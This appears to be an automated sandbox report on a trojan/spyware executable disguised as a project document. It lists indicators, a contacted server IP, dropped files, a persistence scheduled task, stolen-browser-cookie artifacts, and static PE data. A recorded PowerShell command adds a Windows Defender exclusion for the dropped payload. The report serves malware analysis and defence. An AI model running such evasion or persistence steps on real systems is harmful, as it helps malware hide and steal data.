                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCO DRAFT Al Zaytounah project.exe, 00000000.00000002.681428409.0000000003370000.00000004.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmpfalse
                            high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipCO DRAFT Al Zaytounah project.exe, 00000000.00000002.683749748.0000000004279000.00000004.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000008.00000000.678089930.0000000000402000.00000040.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000008.00000000.678611196.0000000000402000.00000040.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.ipify.org%$CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            https://KXS9NVa7QJoby.org$CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            low

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            198.54.126.165
                            server126.web-hosting.comUnited States
                            22612NAMECHEAP-NETUSfalse

                            General Information

                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:532717
                            Start date:02.12.2021
                            Start time:16:38:23
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 9m 11s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:CO DRAFT Al Zaytounah project.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:20
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@9/9@1/1
                            EGA Information:Failed
                            HDC Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 92.122.145.220
                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            16:39:19API Interceptor746x Sleep call for process: CO DRAFT Al Zaytounah project.exe modified
                            16:39:23API Interceptor41x Sleep call for process: powershell.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            198.54.126.165NEW shipment 5 x 40'HC Mundra to Yantian china.exeGet hashmaliciousBrowse
                              statement prfma.exeGet hashmaliciousBrowse
                                OMANTECH PRODUCTS.exeGet hashmaliciousBrowse
                                  TWO NEW QUOTATION.exeGet hashmaliciousBrowse
                                    GOE2103001 SHPT.exeGet hashmaliciousBrowse
                                      VVw0lC8P5l.exeGet hashmaliciousBrowse
                                        14776260521.pdf.exeGet hashmaliciousBrowse
                                          PO_20211153 Dt-241.exeGet hashmaliciousBrowse
                                            INV-257591_77134027.pdf.exeGet hashmaliciousBrowse
                                              PO 100251 05202021.exeGet hashmaliciousBrowse
                                                7b1371c7_by_Libranalysis.exeGet hashmaliciousBrowse
                                                  Purchase Order.exeGet hashmaliciousBrowse
                                                    specifications.exeGet hashmaliciousBrowse
                                                      cargo details.exeGet hashmaliciousBrowse
                                                        Import shipment.exeGet hashmaliciousBrowse
                                                          PROJECT SPECIFICATION.exeGet hashmaliciousBrowse
                                                            customer request.exeGet hashmaliciousBrowse
                                                              Import shipment.exeGet hashmaliciousBrowse
                                                                PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                  MV BBG WUZHOU.exeGet hashmaliciousBrowse

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    server126.web-hosting.comNEW shipment 5 x 40'HC Mundra to Yantian china.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.165
                                                                    statement prfma.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.165
                                                                    OMANTECH PRODUCTS.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.165
                                                                    TWO NEW QUOTATION.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.165
                                                                    GOE2103001 SHPT.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.165
                                                                    VVw0lC8P5l.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.165
                                                                    14776260521.pdf.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.165
                                                                    PO_20211153 Dt-241.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.165
                                                                    INV-257591_77134027.pdf.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.165
                                                                    PO 100251 05202021.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.165
                                                                    7b1371c7_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.165
                                                                    Purchase Order.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.165
                                                                    specifications.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.165
                                                                    cargo details.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.165
                                                                    Import shipment.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.165
                                                                    PROJECT SPECIFICATION.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.165
                                                                    customer request.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.165
                                                                    Import shipment.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.165
                                                                    PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.165
                                                                    MV BBG WUZHOU.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.165

                                                                    ASN

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    NAMECHEAP-NETUSQUOTATION.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.218
                                                                    ufKi6DmWMQCuEb4.exeGet hashmaliciousBrowse
                                                                    • 198.54.119.251
                                                                    ________.exeGet hashmaliciousBrowse
                                                                    • 198.54.122.60
                                                                    REQUEST FOR SPECIFICATION.exeGet hashmaliciousBrowse
                                                                    • 198.54.126.102
                                                                    transferencia r#U00e1pida_____________________________________________________.exeGet hashmaliciousBrowse
                                                                    • 198.54.122.60
                                                                    Invoice.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.218
                                                                    TNT Receipt_AWB87993766478.exeGet hashmaliciousBrowse
                                                                    • 63.250.34.171
                                                                    NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeGet hashmaliciousBrowse
                                                                    • 63.250.34.171
                                                                    lzJWJgZhPc.exeGet hashmaliciousBrowse
                                                                    • 63.250.34.171
                                                                    Poh Tiong Trading - products list.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.217
                                                                    SKM_C01112021.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.210
                                                                    90888234001.exeGet hashmaliciousBrowse
                                                                    • 63.250.34.171
                                                                    TZAT0vss4p.exeGet hashmaliciousBrowse
                                                                    • 162.213.251.105
                                                                    Orden econo-002064.pdf.exeGet hashmaliciousBrowse
                                                                    • 198.54.122.60
                                                                    DOC209272621615.PDF.exeGet hashmaliciousBrowse
                                                                    • 198.54.117.211
                                                                    FedEx Shipping documents.exeGet hashmaliciousBrowse
                                                                    • 63.250.34.171
                                                                    WMHighfield.htmlGet hashmaliciousBrowse
                                                                    • 198.54.115.249
                                                                    quotation-linde-tunisia-plc-december-2021.xlsxGet hashmaliciousBrowse
                                                                    • 198.54.117.216
                                                                    Gracehealthmi.org7X9YCEB6AI.htmGet hashmaliciousBrowse
                                                                    • 162.0.232.224
                                                                    3F6uSD2qZXHmXb8.exeGet hashmaliciousBrowse
                                                                    • 162.255.119.151

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CO DRAFT Al Zaytounah project.exe.log
                                                                    Process:C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):1310
                                                                    Entropy (8bit):5.345651901398759
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
                                                                    MD5:D918C6A765EDB90D2A227FE23A3FEC98
                                                                    SHA1:8BA802AD8D740F114783F0DADC407CBFD2A209B3
                                                                    SHA-256:AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
                                                                    SHA-512:A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
                                                                    Malicious:true
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):22284
                                                                    Entropy (8bit):5.602468410848586
                                                                    Encrypted:false
                                                                    SSDEEP:384:MtCDqfFqTEvVC0MX+RwSBKnAjultI2H7Y9gxSJ3xCT1MabZlbAV75fu5ZBDI+iqE:9TE9C94KACltJTxcQCqfwIV8
                                                                    MD5:ED821277128EEF556CACA25DFB58B59F
                                                                    SHA1:04CA0E63AE5B716690060C55DD07A3AA4CCF7DE2
                                                                    SHA-256:6E780B84A6CDDCAD64CC4D3B3A9D7EA302ADF8D4F1579B9B5658DA31CE9884DA
                                                                    SHA-512:B549CCBD0E85D6FE0EFF1F32A94209764E3645F6D26EF7F362D63E8336D97B42319B2FEC1189D5A7D5B774A10231C3947F765EC19A74A00770ECEB28F123D86C
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview: @...e...........|.......h...t.k.h.....B...I..........@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i2vykftg.4p5.psm1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yroqhmk3.0un.ps1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\tmp79A6.tmp
                                                                    Process:C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
                                                                    File Type:XML 1.0 document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1594
                                                                    Entropy (8bit):5.142504127961618
                                                                    Encrypted:false
                                                                    SSDEEP:24:2di4+S2qh/S1KTy1moCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta1Ixvn:cgeKwYrFdOFzOzN33ODOiDdKrsuTFv
                                                                    MD5:7E64CEBCCC0B61131A84549F1F5087E8
                                                                    SHA1:E209BA633386A652BEFF108E1F5B9C17FDE1E249
                                                                    SHA-256:00EFC5A58AF5AA588BE72D3CAC3AF26E70CA071FCFC1297624B29FF11313D9FF
                                                                    SHA-512:AA210809BF843292573E2F661AB8F394FBCB24FCFCACC7D10D9EB3F90AA3715C4B85DC4676732C5C24E02E6B6A1CC62478C05A26028E9A92EEEBB2D7F7ED631B
                                                                    Malicious:true
                                                                    Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                                                    C:\Users\user\AppData\Roaming\eyjBzJU.exe
                                                                    Process:C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):496640
                                                                    Entropy (8bit):7.757723120728433
                                                                    Encrypted:false
                                                                    SSDEEP:12288:V5Bt/E9PyWvCNaG5W1YBnB4w6jRtOnE0TP+:zcPyWv4aGM1Q4w66E0
                                                                    MD5:80CEC5A926B23B289405700083013293
                                                                    SHA1:FBE4B963E5247B52A42EF7485FC2006A77ECBE3A
                                                                    SHA-256:556B249F8B149348DAEC751C26360CB2CB5ABC61A5F067281E14D771A4817086
                                                                    SHA-512:DB2E3E054B6910982BA8A1758B4B44EA27BDC252380C5D02C8FD8C458F3742C3D415C4BCBC0CDEC8C146633D301A969180B9D9B5E9882FD9F8CA2EF22E9E6638
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 31%
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0..N...D......*l... ........@.. ....................................@..................................k..O........@...........................k............................................... ............... ..H............text...0L... ...N.................. ..`.rsrc....@.......B...P..............@..@.reloc..............................@..B.................l......H.......@E.../......X...Lt..p............................................0...........(.......s....}.....{....r...p.o......{....r...p.o......s2...}.....(....{...........s....o......(....{...........s....o......(....o....&*....0............{.....+..*.0............{.....+..*&...}....*....(....o5...}......(....o3...}.....(.....*...0..Q..........r...pr...p.{.....{....s.....{....s?...(......(....o....&.(....o............-.*....0..e........(........}......{.....{....s....}......++..
                                                                    C:\Users\user\AppData\Roaming\eyjBzJU.exe:Zone.Identifier
                                                                    Process:C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:false
                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                    C:\Users\user\AppData\Roaming\zbmzjx2g.c2f\Chrome\Default\Cookies
                                                                    Process:C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.7006690334145785
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                    MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                    SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                    SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                    SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                    Malicious:false
                                                                    Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\Documents\20211202\PowerShell_transcript.980108.3s9YWMHG.20211202163922.txt
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):5777
                                                                    Entropy (8bit):5.406881529320182
                                                                    Encrypted:false
                                                                    SSDEEP:96:BZqj8NhqDo1ZJZzj8NhqDo1Z5ZHBjZ6j8NhqDo1Z7YRRsZH:k
                                                                    MD5:A1D37B2275124F323B3F760B767B275F
                                                                    SHA1:D3EA0493E7ECCD85431828EEEA42C59B88BA0E2B
                                                                    SHA-256:40CE418CC9819494DB1FDF2E042F8F135B5DAA7A7946C162C2B80961D4A60A2F
                                                                    SHA-512:74BA625FC5E576FC05DED5DEFAAA187FFE52FAEBB7680A7B6B2F35F1FA6A8B879AA62F836284DE07D4FBDAC7B5A79F6AD3A6C4FF8E275B7B7763B06B7E63B3FB
                                                                    Malicious:false
                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20211202163923..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 980108 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\eyjBzJU.exe..Process ID: 6156..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211202163923..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\eyjBzJU.exe..**********************..Windows PowerShell transcript start..Start time: 20211202164329..Username: computer\user..RunAs User: computer\user..Con

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.757723120728433
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    File name:CO DRAFT Al Zaytounah project.exe
                                                                    File size:496640
                                                                    MD5:80cec5a926b23b289405700083013293
                                                                    SHA1:fbe4b963e5247b52a42ef7485fc2006a77ecbe3a
                                                                    SHA256:556b249f8b149348daec751c26360cb2cb5abc61a5f067281e14d771a4817086
                                                                    SHA512:db2e3e054b6910982ba8a1758b4b44ea27bdc252380c5d02c8fd8c458f3742c3d415c4bcbc0cdec8c146633d301a969180b9d9b5e9882fd9f8ca2ef22e9e6638
                                                                    SSDEEP:12288:V5Bt/E9PyWvCNaG5W1YBnB4w6jRtOnE0TP+:zcPyWv4aGM1Q4w66E0
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..N...D......*l... ........@.. ....................................@................................

                                                                    File Icon

                                                                    Icon Hash:8e139232d9cc348a

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x476c2a
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0xB8CA9CB1 [Thu Mar 29 22:35:29 2068 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:v4.0.30319
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x76bd80x4f.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x780000x40d0.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x7e0000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x76bbc0x1c.text
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
